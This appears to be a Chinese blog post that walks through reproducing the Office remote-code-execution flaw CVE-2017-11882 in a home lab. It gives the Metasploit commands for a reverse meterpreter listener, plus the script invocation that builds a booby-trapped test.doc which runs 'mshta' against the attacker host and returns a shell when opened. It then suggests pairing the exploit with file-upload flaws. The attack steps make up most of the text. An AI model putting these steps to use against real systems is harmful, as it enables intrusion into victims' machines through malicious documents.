炒冷饭系列之利用Office文档get shell

2017年11月14日,微软发布了11月份的安全补丁更新,修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882),这是个Office内存破坏漏洞,影响目前流行的所有Office版本,攻击者可以利用漏洞以当前登录的用户的身份执行任意命令,对于企业来说危害很大。最大的亮点就是这个漏洞完美无弹窗,无视宏,影响Ms offcie全版本,#手动滑稽。


这么厉害的一个漏洞看的我心里还是很痒痒的,今天咱们就把这个漏洞的利用过程复现一番~

实验工具使用的是网上之前放出的Poc以及一个Command43b_CVE-2017-11882.py脚本文件,使用python执行Command43b_CVE-2017-11882.py文件:

炒冷饭系列之利用Office文档get shell

可以看到这里生成了一个名为test.doc的office文档,我们打开试一下:

炒冷饭系列之利用Office文档get shell

打开office文档之后立刻跳出了一个计算器,也就是说,利用这个漏洞,我们可以通过office执行其他很多微妙的操作~

既然有这个想法,那么咱们就祭出渗透大杀器Kali来一窥究竟!

实验准备:

攻击机:kali

靶机:windows7

实验工具:MSF渗透平台、Command43b_CVE-2017-11882.py、PS_shell.rb、ms17-010.rb(其中PS_shell.rb和ms17-010.rb分别是这个漏洞和之前爆出的“永恒之蓝”漏洞的利用模块)

实验开始:

首先打开kali,查看IP,可以看到我的虚拟机kali的IP是192.168.1.104。

炒冷饭系列之利用Office文档get shell

把Command43b_CVE-2017-11882.py和 PS_shell.rb文件放入kali。

我系统中ms17-010.rb文件的路径是:

/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb

这里需要把PS_shell.rb放入smb路径下,然后我这里就PS_shell.rb和ms17-010.rb放在了一起。

接下来,我们需要请出MSF:

终端下输入:

Msfconsole

然后重新加载所有模块:

reload_all

接下来输入命令:

search PS_shell

调用攻击模块:

use /exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.104

set uripath abc

exploit

这一步会出现:

started reverse tcp hander on 192.168.1.104:4444

using url,local ip,,,

mshta.exe"http://192.168.1.104:8080/abc"

如图:

炒冷饭系列之利用Office文档get shell

接下来我们要在kali下使用Command43b_CVE-2017-11882.py 这个脚本。

在桌面打开终端执行命令生成刚才演示的这个test.doc:

python Command43b_CVE-2017-11882.py -c"mshta http://192.168.1.104:8080/abc" -o test.doc

将其复制到 win7里再用 office2013 打开,这里在win7中打开文档的时候,kali下msf里输入sessions

然后就得到了喜闻乐见的shell~

炒冷饭系列之利用Office文档get shell

至此,漏洞体验结束,总的来说这个漏洞非常灵活好用,如果搭配文件上传之类的漏洞整个过程估计会体验极好~

很惭愧,只做了一点微小的工作,谢谢大家!

炒冷饭系列之利用Office文档get shell


分享到:


相關文章: